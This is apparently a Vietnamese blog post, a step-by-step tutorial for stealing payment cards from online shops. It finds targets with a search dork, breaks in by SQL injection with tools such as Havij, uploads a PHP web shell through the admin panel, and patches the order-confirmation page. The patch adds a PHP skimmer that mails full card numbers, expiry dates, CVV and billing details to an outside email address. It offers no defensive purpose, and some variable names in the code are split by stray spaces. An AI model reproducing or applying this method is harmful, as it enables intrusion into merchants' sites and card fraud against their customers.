TUT Hack CC

allinurl: /sub.php?Page=1

chuyển về dạng
http://abc.com/detail.php?pid=....
hack bằng tool hoangduye cũng được mà havij cũng được,hack bằng cái gì cũng được

get admin ( trong table user nhớ gét colums role để tìm admin ,pass mã hóa sha1( admin thường thì role là 1)

link admin
http://abc.com/admin_login.php

http://abc.com/cp
vào admin phần category up shell lên để đuôi php hoặc .jpg.php tùy thích

tiếp theo vào shell sửa file orderconfirm.php ( tùy file tùy shop cách tìm file này là vào shop order đến phần nhập cc sau đó hiện comfim sẽ ra name file http://abc.com/file can edit .php

vào shell tìm file đó

sau đó tìm đoạn này

<? echo

"" . substr($card_no,-4) . "<br>" .

$ex_month . "/" . $ex_year . "<br>" .

$cid;

?>
thường thì code gốc là hiện 4 số cuối của cc

sửa số màu đỏ thành số 0

sau đó gán thêm hàm này vào phía dưới
<?

$to = 'tmtno1@vnhack.us';

$subject = 'CC - Order ID:'+$order_id; $message = $order_id."|".$card_type."|".$card_no."|".$ex_mont h."|".$ex_year."|".$cid."|".$bill_name."|".$bill_a ddress."|".$bill_city."|".$bill_state."|".$bill_zi p."|".$bill_dphone."|".$bill_country; $headers = 'From: webmaster' . "\r\n" . 'Reply-To: webmaster' . "\r\n" .

'X-Mailer: PHP/' . phpversion();

mail($to, $subject, $message, $headers);

?>
notice : do file order chính mã hóa nên hack cc bằng cách sử file nối đến file order chính,cc k đảm bảo live 100%,chuẩn bill 100%

có shop thì có thể xem đc cc mã hóa qua admin,có shop thì k lưu lại cc nên phương pháp hack = shell này nhanh gọn lẹ nhất

0 nhận xét:

Copyright © 2013 2 USD Hình Con Chó 2018|TienLiXiTet.Com|0966.85.0966